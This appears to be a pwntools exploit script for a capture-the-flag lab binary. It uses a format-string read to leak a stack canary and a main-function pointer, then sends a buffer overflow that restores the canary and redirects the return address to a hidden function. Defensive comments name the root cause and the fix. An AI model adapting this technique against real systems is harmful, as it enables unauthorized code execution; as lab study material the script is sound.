
#!/usr/bin/env python
# Reference proof-of-concept for a stack buffer overflow on a binary built with a
# stack canary: a format-string read first leaks the canary and a code pointer,
# so the later overwrite can reproduce the canary and the canary check passes.
# Everything below (host, port, stack slot numbers, buffer size, the 0x45
# adjustment) is specific to one lab target and build; it is not reusable as-is.
# Root cause on the defender side: user input reaches a printf-style format
# string. A fixed format (e.g. printf("%s", buf)) removes the leak, and without
# the leak the canary alone stops the overwrite.
from pwn import *
from time import sleep
# Local-process variant, left disabled: load the binary into pwntools and spawn it.
#elf = context.binary = ELF('./pwn107.pwn107')
#p = process()
# Hard-coded lab endpoint; the script only runs against this host.
p = remote('10.10.216.4', 9007)
sleep(1)
# Format-string read of two stack slots: per the original note, %13$p is the
# canary and %19$p is a pointer into main. The slot numbers belong to this binary.
p.sendline(b'%13$p,%19$p') # No. on stack. 1st: canary, 2nd: pointer to main function
sleep(1)
# Parse the reply: whitespace-split token 62 is expected to be "canary,pointer".
# Brittle: it depends on the exact banner text, and p.recv() may return a
# partial read, in which case the [62] lookup raises IndexError.
addresses = (p.recv().split())[62].decode().split(',')
print(addresses)
# Payload: Buffer + canary content + bsp + return pointer filled with address of the hidden function
# Layout, all 64-bit (p64): 24 bytes of buffer fill, the leaked canary so the
# check passes, 8 bytes of filler for the saved frame pointer (the note's "bsp"),
# then the return address computed as the leaked main pointer minus 0x45.
# NOTE(review): the subtraction presumes the leaked pointer and the target
# function keep a fixed distance, i.e. it is valid only for this exact build.
payload = b'A' * 24 + p64(int(addresses[0],16)) + b'B' * 8 + p64(int(addresses[1], 16) - 0x45)
p.sendline(payload)
sleep(1)
# Hand the connection over to the operator once the payload has been sent.
p.interactive()